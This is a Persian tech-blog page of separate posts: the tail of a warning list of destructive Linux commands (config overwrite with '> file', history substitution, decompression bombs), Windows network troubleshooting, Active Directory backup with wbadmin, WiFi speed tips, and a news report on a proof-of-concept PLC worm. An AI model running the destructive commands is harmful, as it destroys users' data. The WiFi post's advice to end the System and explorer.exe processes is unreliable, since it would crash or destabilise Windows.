این دستور را می‌توانید معادل فرمت کردن پارتیشن C در سیستم‌عامل ویندوز در نظر بگیرید. به‌طوری که دیگر هرگز به داده‌های خود دست پیدا نخواهید کرد. به این شکل سیستم شما تبدیل به یک دستگاه غیر قابل مصرف می‌شود.

۷٫ > File

این فرمان برای پاک کردن محتوای فایل‌ها مورد استفاده قرار می‌گیرد. اگر دستور بالا همراه با ترکیبی شبیه به > xt.conf اجرا شود، فایل پیکربندی یا هرگونه فایل پیکربندی سیستمی را رونویسی خواهد کرد.

۸٫ ^foo^bar

این فرمان به خطرناکی دستوراتی نیست که به آن‌ها اشاره کردیم. این فرمان به منظور ویرایش فرمانی که قبلا اجرا شده است بدون آن‌که نیازی به تایپ مجدد فرمان ضرورتی داشته باشد مورد استفاده قرار می‌گیرد. در یک وضعیت اشتباه، این دستور به شکل مفرطی باعث وارد شدن آسیب‌های جبران‌ناپذیری می‌شود. به ویژه اگر دستوری که قبلا اجرا شده است را چک نکرده باشید، ^foo^bar می‌تواند خطرناک باشد.

۹٫ Decompression Bomb

زمانی که از شما درخواست می‌شود تا یک فایل فشرده‌شده را باز کنید، محتوای فایل ممکن است به شدت فشرده شده باشد. زمانی که یک فایل را از حالت فشرده خارج می‌کنید، صدها گیگابایت داده استخراج می‌شوند که می‌توانند هارددیسک شما را پر کرده و به این شکل کارایی سیستم شما را پایین آورند. در نتیجه سعی کنید از اینکار اجتناب کنید.

اکنون که با این دستورات آشنا شدید، به خوبی می‌توانید از اجرای این دستورات ممانعت به عمل آورید.

4 راه حل سریع برای مشکلات Network Connection ویندوز

کسانی که از Wireless و Ethernet برای شبکه کردن استفاده میکنند اکثرا با مشکلات زیادی روبه رو میشوند. این مشکلات میتونه هر چیزی باشد مثله عدم وصل نشدن به اینترنت یا خارج شدن از شبکه و غیره.

متاسفانه بعضی وقت ها شناسایی مشکلات Network Connection خیلی سخت هست و به راحتی نمیشه فهمید مشکل اصلی از کجا هست. حالا ما اینجا به شما چند روش برای کمک کردن تو حل مشکلات معرفی میکنیم. منابع این مطالب از مقاله های آقای McDowell’s و Karl Gechlik’s هست که اینجا میگزارم.

من اینجا میخواهم 4 روش خوب برای درست کردن مشکلات اینترنتی و کانکشن ها معرفی کنم ، البته این دستور العمل ها فقط برای ویندوز های ایکس پی ، 7 و ویستا هست.

چک کردن فایل های Host

ویندوز میتواند هر فایلی را از host های که IP های مشخصی دارند دریافت کند و از آنها استفاده کند ، این به این معنا هست که ممکنه گاهی مشکلاتی پیش بی آید و ویندوز از مسیر خود خارج بشود ، و مثلا از یک host دیگر استفاده کنند و موجب قطع شدن اینترنت میشود.

حالا در این شرایط باید عیب یابی کنیم ، که این عیب یابی معمولا از ابتدای کار شروع میشه و باید به همه چیز خوب نگاه کنیم.

این روشی که میگم برای ویندوز ایکس پی هست ، شما اول باید فایل host را پیدا کنید ، به درایوی که ویندوز خود را در آنجا نصب کرده اید بروید ، فولدر Windows را باز کنید و بعد فولدر System32 و سپس فولدر drivers و در آخر فولدر etc را باز کنید ، حالا اینجا دنبال فایلی با نام hosts بگردید ، حالا روی آن کلیک کنید و آن را با Notepad باز کنید.

البته بهتره همه فایل های که در etc وجود دارد را به صورت پیش فرض روی Notepad قرار بدید چون ممکنه بعدا هم با این فایل ها کار داشته باشید.

بعد از باز کردن فایل روی Notepad شما باید چنین صفحه ای را ببینید:

در این صفحه باید فقط همین خط ها و اطلاعات مربوط به stuff و localhost را داشته باشید. و اگر چیز اضافه ای وجود دارد باید آنها را پاک کنید.

همین دستورالعمل برای ویندوز ایکس پی و ویندوز 7 کار میکند و میتوانید از همین روش برای ویندوز خود استفاده کنید. فقط برای باز کردن این فایل ها در Notepad باید روی آنها راست کلیک کرده و گزینه Run as administrator را انتخاب کنید.

چک کردن تنظیمات IP

یکی دیگر از مسئله های که موجب به مشکل خوردن و دگرگون شدن شبکه میشود تنظیمات TCP/IP هست.

اگر ویندوز XP دارید به Control Panel بروید و سپس Network Connections را باز کنید.

اگر ویندوز7 یا ویستا دارید به Control Panel بروید و سپس Network and Sharing Center باز کنید ، حالا در این پنجره اگر ویندوز 7 دارید روی change adapter settings کلیک کنید و اگر ویندوز ویستا دارید روی manage network connections کلیک کنید.

بعد از رفتن به این قسمت که گفتیم ، روی دستگاهی که دچار مشکل شده مثله Wireless یا LAN کلیک راست کنید ، و گزینه Properties را انتخاب کید.

بعد از کلیک روی Properties یک پنجره مانند عکس زیر باز میشود.

حالا روی Internet Protocol Version 6 and then hit کلیک کنید تا آن رنگی بشود ، سپس دکمه Properties را بزنید ، و بعد یک پنجره مانند عکس زیر ظاهر میشود.

حالا این دو گزینه را باید روی automatic تنظیم کنید که اگر مشکلی داشته باشد درست بشود.

و بعد از زدن OK همین کار را روی Internet Protocol Version 4 انجام دهید.

ریست دستی تنظیمات TCP/IP

بعضی وقت ها ممکنه مشکل شما فقط با ریست کردن TCP/IP درست بشود. برای ریست کردن TCP/IP هم میتوانید با CMD ویندوز انجام دهید.

روش کار روی ویندوز XP : به این آدرس بروید Start->Run و در داخل کادر سفید کلمه cmd را تایپ کرده و Enter را فشار دهید ، یک پنجره باز میشود که باید درون آن netsh int ip reset c:\resetlog.txt را تایپ کنید و بعد Enter را فشار دهید ، و سپس کامپیوتر خود را ریست کنید.

روش کار روی ویندوز 7 و ویستا : ابتدا برنامه Command Prompt را به عنوان administrator اجرا کنید ، برای این کار میتوانید در کادر جستجوی که در Start وجود دارد کلمه cmd را وارد کنید ، و سپس روی آیکون cmd کلیک راست کرده و گزینه Run as administrator انتخاب کنید ، حالا باید netsh int ip reset c:\resetlog.txt را تایپ کنید و دکمه Enter را فشار دهید ، سپس بعد از انجام کار ، کامپیوتر خود را ریست کنید.

ریست دستی تنظیمات Winsock

کلمه Winsock کوتاه شده ی کلمه Windows Socket API میباشد. ریست تنظیمات Winsock ممکنه باعث درست شدن مشکلات اینترنتی و کانکشن ها بشود.

روش ریست کردن تنظیمات Winsock تقریبا مانند ریست تنظیمات TCP/IP میباشد که در قبل گفتیم. مانند دفعه قبل برنامه CMD را باز کنید ، و در آن جمله netsh winsock reset را تایپ کنید و بعد Enter را فشار دهید و سپس بعد از انجام عملیات ، کامپیوتر را ریست کنید.

گاهی اوقات انجام این عملیات که به شما معرفی کردیم موجب بر طرف شدن مشکلات اینترنتی و شبکه ای نمیشود. برای حل این مشکلات میتوانید از جستجوی گوگل استفاده کنید و شاید بتوانید راه حلی پیدا کنید و مشکل خود را حل کنید.

اگر شما راه ها و روش های بهتری برای درست کردن انواع مشکلات کانکشن ها و شبکه ها میدانید ، آنها را در بخش نظرات به ما اطلاع دهید.

بک آپ گیری از Active Directory- قسمت دوم

در مرحله بعدی میتوانید هاردی را که می خواهید به عنوان مکان ذخیره سازی در نظر بگیرید را انتخاب کنید. در اینجا یک هارد اکسترنال که به سیستم متصل است را نشان می دهد.اگر پارتیشن های موجود در سیستم را بخواهید انتخاب کنید بر روی show all available disk را انتخاب کلیک کنید.

یکی از هارد ها را انتخاب کنید و بر روی ok کلیک کنید.

با کلیک بر روی Next پیعام زیر ظاهر میشود.با کلیک بر روی Yes هاردی را که انتخاب کرده اید را فرمت می کند و برای بک آپ گیری آماده می کند.(اگر دیتایی در این هارد داشته باشید با کلیک بر روی این پیغام به طور کامل پاک می شود)

و در پایان با کلیک بر روی Format عملیات تمام می شود.

و پارتیشن فرمت شده با نامی که انتخاب شده ، ایجاد می شود.

Backup to Volume :با انتخاب این گزینه ، بک آپ ها را در یک هارد ذخیره می کند. این هارد مختص بک آپ گیری نیست و دیتای دیگری هم می توانید در این هارد ذخیره کنید.

برای انتخاب هارد بر روی Add کلیک کنید و یک هارد را انتخاب کنید.

Back up to a shared network folder :
با انتخاب این گزینه فایل های بک آپ را می توانید در یک مسیر شبکه ایی ذخیره می شود.

با کلیک بر روی Next ، یک پیغام ظاهر می شود، مبنی بر این که با اانتخاب این روش ذخیره سازی در هر باز اجرا شدن بک آپ ،فایل قبلی پاک می شود و تنها آخرین بک آپ همیشه در دسترس می باشد.

در این قسمت مسیر مورد نظر را وارد کنید و بر روی Next کلیک کنید.

با کلیک بر روی Next ، یک پنجره باز می شودو شما باید کاربری را که دسترسی کامل به این مسیر دارد را وارد کنید.

با استفاده از کامند (دستی):
بک آپ گیری از System State با استفاده از کامند Wbadmin در اینجا آموزش داده می شود.
۱- ابتدا بر روی CMD کلیک کنید.
۲-کامند زیر را تایپ کنید.

wbadmin start systemstatebackup -backupTarget:<VolumeName>  [-noverify]  [-quiet

هنگامی که بک آپ گیری تمام می شود در درایوی که محل ذخیره سازی فایل ها انتخاب کرده اید یک فولدر به صورت زیر ایجاد می شود

*در قسمت Volume Name در اینجا مقصدی را که می خواهید بک آپ ها در آن ذخیره شوند را مشخص می کنید، این مکان را می توانید یک درایو لوکالی یا مکانی در شبکه باشد که آدرس آنرا به این صورت باید بنویسید.

\\ServerName\ShareName

*با انتخاب پارامتر Noverify دیگر در هنگام بک آپ گیری و ذخیره آن بر روی Removal Media عملیات Verify ایجاد نمی شود.

* quite- : با انتخاب این پارامتر دیگر تاییده ایی بابت شروع بک آپ از شما گرفته نمی شود. و بعد از وارد کردن کامند و انتخاب اینتر ، عملیات بک آپ گیری آغاز می شود.
اگر کامند را بدون سوییچ quite- اجرا کنید از شما تاییده ایی می خواهد تا بک آپ گیری آغاز شود . در شکل زیر نشان داده شده است :

با استفاده از کامند(زمانبندی):
ابتداCMD را باز کنید. و کامند زیر را تایپ کنید.

wbadmin enable backup [-addtarget:<BackupTarget>] [-schedule:<TimeToRunBackup>]  [-systemState] [-vssFull | -vssCopy] [-quiet

*در مقابل پارامتر Schedule می توانیم زمان را وارد کنیم.
به عنوان مثال در ساعت ۱:۳۰ هر شب بک آپ گیری انجام می شود و در پارتیشن Fذخیره می شود.

بک آپ گیری از Critical Volume :
وقتی که شما با استفاده از Windows Server Backup از تمام Critical درایو ها بر روی یک دومین کنترلر بک آپ می گیرد. این بک آپ گرفته شده شامل تمامی اطاعات زیر می باشد:
-درایوهایی که شامل بوت فایل می باشد.
-درایوی که شامل رجیستری و فایل های مربروط به سیستم عامل می باشد.
-درایوی که شامل Sysvol  می باشد.
-درایوی که شامل فایل Log ، دیتابیس اکتیودایرکتوری می باشد.

با استفاده از GUI (دستی و زمانیندی):
دقیقا مثل مراحل قبل است فقط شما باید در مرحله Select Item For Backup ، قسمت Bare Mental Recovey را انتخاب کنید.

**به یاد داشته باشید ، پارتیشنی را که به عنوان مکان ذخیره سازی در نظر می گیرید جز Critical درایو نباشد زیرا در هنگام اختصاص آن فضا به فایل های ذخیره سازی نیاز به فرمت است.
دقیقا مثل مراحل قبل فقط باید پارامتر all critical- به صورت زیر اضافه کنید.

Wbadmin  startbackup   -backupTarget:<VolumeName>  [-critical] [-noverify]  [-quiet

برای زمانبندی شده به صورت زیر :

wbadmin enable backup [-addtarget:<BackupTarget>]  [-schedule:<TimeToRunBackup>] [-allCritical]  [-vssFull | -vssCopy] [-quiet]

بک آپ به صورت Full :
با این روش از تمامی پارتیشن ها و اطلاعات سیستم به صورت کامل بک آپ گرفته می شود .
با استفاده از GUI  : (دستی و زمانبندی)
هنگامی که کنسول بک آپ را باز میکنید گزینه Full Server را انتخاب کنید.
بقیه مراحل به صورت قبل می باشد.
با استفاده از کامند (دستی و زمانبندی)
برای اینکه بتوانید از یک سیستم به طور کامل با استفاده از wbadmin بک آپ بگیرید ، کامند زیر را تایپ کنید :

wbadmin start backup -include:<sourceDrive_1>:,<sourceDrive_2>:,… <sourceDrive_n>: -backuptarget:<targetDrive>: -quiet

پارامتر Include ، پارتیشن هایی را که میخواهید بک آپ گرفته شود را وارد می کنید.

بک آپ گیری از Active Directory- قسمت اول

ویندوز سرور ۲۰۰۸R2 شامل یک نرم افزاری جدید به نام Windows Server Backup است. که به صورت پیش فرض این نرم افزار نصب نمی باشد. برای این کار نیاز است که شما آنرا از قسمتFeatures ها درServer Manager ، اضافه کنید.
نکته : ابزار Windows Server Backup جایگزین ntbackup است که در نسخه های قلبی ویندوز بود، شده است. شما نمی توانید بک آپ هایی را که با استفاده از ntbackup   ایجاد کرده اید را توسط ابزار Windows Server Backup ، ریستور کنید. اگر شما بک آپ هایی دارید که احتیاج به ریستور آنها دارید باید از لینک زیر ورژن ای از ntbackup را که سازگار با این ورژن ویندوز سرور است را دانلود کنید.

برای نصب Windows Server Backup می توانید ازچهار روش زیر استفاده کنید :
۱-با استفاده از Server Manager۲-با استفاده از Servermanagercmd.exe۳-با استفاده از PowerShell۴-با استفاده از Optional Component Setup (OCSetup )
نکته : برای نصب و استفاده Windows Server Backup ، یوزر مورد نظر حتما باید از امتیازات ، Backup Operators group,Administrative بر خوردار باشد.نصب Windows Server Backup با استفاده از Server Manager :
۱-بر روی start کلیک کنید و سپس  Server Manager را انتخاب کنید.۲-از قسمت Features Summary بر روی Add Features کلیک کنید.۳-در این پنجره بر روی Windows Server Backup Features دابل کلیک کنید . سپس گزینه Windows Server Backup و Command-line tools را انتخاب کنید و بر روی Next کلیک کنید._{۴-در پنجره Confirmation Installation Selections بر روی Install کلیک کنید.}
۵-در پایان بر روی Close کلیک کنید. (در پایان نصب نیاز به ریستارت سرور نیست.)

نصب Windows Server Backupبا استفاده از Servermanagercmd.exe :

بر روی Command Prompt کلیک کنید.کامند زیر را تایپ کنید.

ServerManagerCmd -install Backup-Features -allSubFeatures

نصب Windows Server Backup با استفاده از OCSetup :۱- بر روی Command Prompt کلیک کنید.
۲-کامند زیر را تایپ کنید. بعد از زدن اینتر چند دقیقه صبر کنید تا ویژگی Windows Server Backup نصب شود.

ocsetup WindowsServerBackup

بعد از نصب Windows Server Backup نوبت به انجام مراحل بک آپ گیری از اکتیو دایرکتوری می رسد. بک آپ گیری از دومین کنترلر را می توانیم به سه روش زیر انجام دهیم.

در دومین کنترلر ،System State شامل تمام رول هایی است که بر روی سیستم نصب شده است و همچنین شامل اطلاعات زیر می باشد:

Registry
COM+ Class Registration database
Boot files Active Directory Certificate Services (AD CS) database
Active Directory database (Ntds.dit
SYSVOL directory
Cluster service information
Microsoft Internet Information Services (IIS) metadirectory
System files that are under Windows Resource Protection

بک آپ از System state :
با استفاده از GUI :
۱-کنسول بک آپ را باز کنید.
۲-طبق شکل زیر Backup Once را انتخاب کنید.۳- گزینه Custom را انتخاب کنید.

۴- بر روی Add Item کلیک کنید.
۵- System State را انتخاب کنید.
۶- در پنجره Specify Destination Type ، دو انتخاب جهت ذخیره فایل های بک آپ گرفته شده دارید. اگر
local Drive :را انتخاب کنید فایل های بک آپ گرفته شده بر روی پارتیشن های موجود در سیستم یا DVD ذخیره می شود.

Remote Shared Folder :می توانید فایل های بک آپ گرفته شده را در مسیری شبکه ایی ذخیره کنید.
۷-در پنجره Confirmation ، بر روی Backup  کلیک کنیدتا عملیات بک آپ گیری آغاز شود.
با استفاده از GUI (زمانبندی):
۱- کنسول بک آپ را باز کنید.
۲-گزینه Backup Schedule را انتخاب کنید.۳- اگر برای اولین باز اشت که یک تسک زمانبندی شده می سازید پنجره زیر ظاهر می شود.
۴- گزینه  custom را انتخاب کنید.۵-بر روی Add Item کلیک کنید.۶- System State را انتخاب کنید.
۷- در پنجره Specify Backup Time ،شما دو انتخاب دارید.
one a day :در زمان مشخص شده یک بار در روز بک آپ گرفته می شود.
more than once day : در این قسمت می توانید ، بیشتر از یک بار در روز بک آپ بگیرید.فقط کافی است زمان مورد نظرتان را به قسمت راست اضافه کنید.۸- در پنجره مربوط به Specify Destination Type ، سه انتخاب دارید.
Back up to a hard disk that is dedicated for backup :با انتخاب این گزینه، هارد دیسکی را که برای ذخیره سازی در نظر گرفته اید را فرمت کنید و فقط به ذخیره  بک آپ گرفته اختصاص می دهد.

ترفندی ساده برای افزایش سرعت WiFi

با استفاده از این ترفند می توانید مصرف اینترنت خود را پایین بیاورید و سرعت آن را افزایش دهید.
دلایل زیادی برای کاهش سرعت وای فای وجود دارد؛ قدرت سیگنال دهی وای فای که البته با ترفندهای تقویت سینگنال دهی وای فای قابل حل است، تغییرکانال وای فای، مشکلات روتر و غیره.  چیزی که در ارتباط با مشکلات احتمالی وای فای وجود دارد تشخیص قسمتی است که سبب کاهش سرعت و افت کیفیت وای فای میشود. با چک کردن موارد اساسی در روتر و نرم افزار مربوط به روتر و همچنین به کارگیری ترفندهای افزایش سرعت وای فای می توانید به سادگی مشکلاتی که سبب افت سرعت وای فای شما شده اند را تشخیص و برطرف کنید.

روتر را خاموش و روشن کنید
شاید برای شما جالب باشد که بدانید خاموش و روشن کردن وای فای در اغلب موارد کندی سرعت وای فای را برطرف می کند. تنها کافی است در مرحله اول مودم خود را برای ۱۰ تا ۱۵ ثانیه خاموش کنید و سپس آن را روشن نمایید. گاهی قطع اتصال موبایل و سایر دستگاه ها از وای فای و روتر نیز می تواند موثر باشد. در واقع بهتر است مودم خود را برای چند ثانیه از تمام اتصالات موجود خارج کنید.

دستگاه های متصل به روتر را چک کنید
برای وای فای شما و به طور کلی هر نوع اینترنتی که مصرف می کنید یک پهنای باند ثابت در نظر گرفته میشود. این میزان به صورت مساوی میان تمام دستگاه های موجود تقسیم میشود. به صورت کلی اگر موبایل یا کامپیوتر های مجاور یک صفحه اینترنتی معمول را باز کنند تاثیر چندانی روی سرعت اصلی نمی گذارند؛ اما بازی های آنلاین یا دانلود کردن می تواند تاثیر به سزایی روی سرعت وای فای شما داشته باشد. بنابراین دومین گام بعد از خاموش و روشن کردن روتر بررسی سایر دستگاه هایی است که از روتر و وای فای شما استفاده می کنند. دقت داشته باشید که تنها عدم استفاده دستگاه از وای فای به معنای حذف آن از دایره پهنای باند نیست؛ اگر وای فای دستگاه همچنان وصل باشد در پس زمینه برنامه ها از پهنای باند شما کسر می گردد.

غیرفعال کردن پس زمینه برنامه های مصرف کننده
همواره در برنامه های مختلف نظیر شبکه ها اجتماعی از پهنای باند برای آپدیت شدن دیتا استفاده میشود. در ویندوز نیز به صورت خودکار اطلاعات به روزرسانی ها دریافت میشود و نسخه های جدید به صورت خودکار نصب میشوند. بنابراین به صورت کلی راه هایی همواره وجود دارد که از پهنای باند اینترنت می کاهد؛ اما کاربران معمولا از آن ها آگاهی ندارند. برای غیر فعال کردن پس زمینه برنامه ها از ترفند زیر استفاده کنید:

در صورتی که کاربر ویندوز هستید می توانید میزان مصرف پهنای باند هر برنامه را از طریق Windows Task Manager چک کنید. برای دسترسی ساده به این بخش از کلید های ترکیبی Ctrl+Shift+Esc استفاده کنید. تب Processes را مطابق با شکل زیر انتخاب کنید تا فرآیند یا پروسه مصرفی هر برنامه یا خود ویندوز را مشاهده کنید. حال به دنبال برنامه هایی بگردید که می دانید از پهنای باند شما استفاده می کنند اما برای شما کاربردی ندارند. End Process را برای متوقف کردن پس زمینه هر برنامه انتخاب کنید و نهایتا تغییرات را ذخیره کنید. برنامه هایی مثل  Windows, Microsoft, explorer.exe و System می توانند برای متوقف کردن پس زمینه انتخاب خوبی باشند و تاثیر زیادی نیز روی آزاد شدن پهنای باند خواهند داشت.

خاموش و روشن کردن وای فای در اغلب موارد کندی سرعت وای فای را برطرف می کند

به امنیت وای فای خود توجه کنید
پیشرفته ترین پورتکلی که برای بهبود امنیت وای فای به کارگرفته میشود WPA2 security می باشد. تنظیمات پسورد خود را تغییر دهید و ایمن ترین پسورد را از طریق وارد کردن آی پی مودم خود و ورود به تنظیمات آن انتخاب نمایید.
برای دسترسی به آدرس آی پی تنها کافی است از کلیدهای Windows + R استفاده کنید و در پنجره RUN ، عبارت cmd را تایپ کنید.

ترفندهای افزایش سرعت وای فای

در کادر بعدی مطابق با شکل زیر ipconfig را تایپ کنید تا آدرس آی پی را مقابل “Default Gateway” مشاهده کنید.

این کرم فقط به اهداف صنعتی حمله می‌کند!

بدون شک کنفرانس کلاه سیاه برای همه کارشناسان دنیای امنیت جالب توجه است. کارشناسان امنیتی سراسر جهان با جدیدترین دستاوردهای خود در زمینه کشف آسیب‌پذیری‌ها یا ارائه راه‌حل‌ها به این کنفرانس وارد می‌شوند. شاید دستاورد شرکت OpenSource Security در این میان جالب توجه باشد. این شرکت موفق به شناسایی کرمی شده است که تنها شبکه‌های صنعتی را مورد هدف قرار می‌دهد.

مایک بروگمن، توسعه‌دهنده نرم‌افزار در شرکت OpenSource Security در کنفرانس امسال یک مدل مفهومی از یک کرم را به تصویر کشید که نقاط ضعف سامانه‌های کنترل صنعتی را شناسایی کرده و با استفاده از آن‌ها به زیرساخت‌های حیاتی و تولیدی حمله می‌کند. آن‌گونه که این شرکت گزارش کرده است، این کرم به صورت مستقل این توانایی را دارد تا به جستجو پرداخته و خود را میان کنترل‌های منطقی قابل‌برنامه‌ریزی (PLC) متصل به شبکه قرار داده و به تکثیر خود بپردازد.

این کرم به‌طور خاص به سامانه‌های PLC مدل SIMATIC S7-1200 که توسط شرکت زیمنس ساخته شده است حمله می‌کند. بروگمن در این ارتباط گفته است: «این مدل تهدیدات در نوع خود جدید هستند. به دلیل این‌که شرکت‌های فعال در حوزه صنعت به خوبی قادر هستند به شکلی سنتی از خودشان در برابر تهدیدات فیزیکی محافظت به عمل می‌آورند، اما در شیوه نرم آن‌ها همواره در معرض خطر قرار دارند. انتشار این چنین کرمی برای سامانه‌های کنترل صنعتی از طریق یک تامین کننده تجهیزات یا حتا از درون خود سامانه‌های صنعتی دور از انتظار نیست. این خطر تنها شرکت زیمنس و محصولات تولید شده توسط این شرکت را تهدید تهدید نمی‌کند، بلکه این کرم قادر است هر نوع شبکه صنعتی را در معرض خطر قرار دهد.»

در این کنفرانس بروگمن نشان داد، مجرمان چگونه می‌توانند با دسترسی فیزیکی یا دسترسی به یک شبکه PLC این کرم را وارد شبکه کرده و در ادامه حمله خود را پیاده‌سازی کنند. این کرم قادر است به گونه‌ای برنامه‌ریزی شود تا زمینه‌ساز انواع مختلفی از حملات شود. یک PLC آلوده می‌تواند به گونه‌ای برنامه‌ریزی شود تا به‌طور خودکار و از راه دور با یک سرور کنترل و فرمان‌دهی متعلق به مجرمان به شرط آن‌که PLC به شبکه جهانی اینترنت متصل شده باشد ارتباط برقرار کند. سناریوهای احتمالی حمله می‌تواند شامل خاموش کردن دستگاه یا دستکاری مولفه‌های حیاتی یک زیرساخت باشد. پژوهش‌گران ادعا کرده‌اند که موفقیت این کرم به رخنه‌های موجود در طراحی PLCهای ساخته شده توسط شرکت زیمنس باز می‌گردد. به‌طوری که راه را برای پیاده‌سازی یک حمله از طریق کنسول مدیریتی TIA Portal باز می‌کند.

اولین مشکل به کدی باز می‌گردد که برای مدیریت دسترسی به گذرواژه‌های PLC و شماره سریال‌های که  Knowhow Protection و  Copy Protection نامیده می‌شود مورد استفاده قرار می‌گیرد. این ویژگی فاقد قابلیت محافظت یکپارچه است. همین موضوع باعث می‌شود تا یک هکر بتواند بلاک‌های کدی که به نوعی با گذرواژه درهم و شماره سریال‌ها در ارتباط هستند را بخواند، آن‌ها را دستکاری کرده و در نهایت رونویسی کند. این‌کار باعث به وجود آمدن روزنه‌ای می‌شود که راه را برای فرار از حفاظت درگاه نرم‌افزاری TIA هموار می‌کند. به‌طوری که به این کرم اجازه دهد درون محیط وارد شده و بارگذاری شود.

شرکت زیمنس در ارتباط با این گزارش گفته است، ما هیچ‌گونه نشانه‌ محکمی دال بر وجود یک آسیب‌پذیری مشاهده نمی‌کنیم. ما همواره به مشتریان خود اعلام می‌داریم قابلیت حفاظت دسترسی را فعال سازند.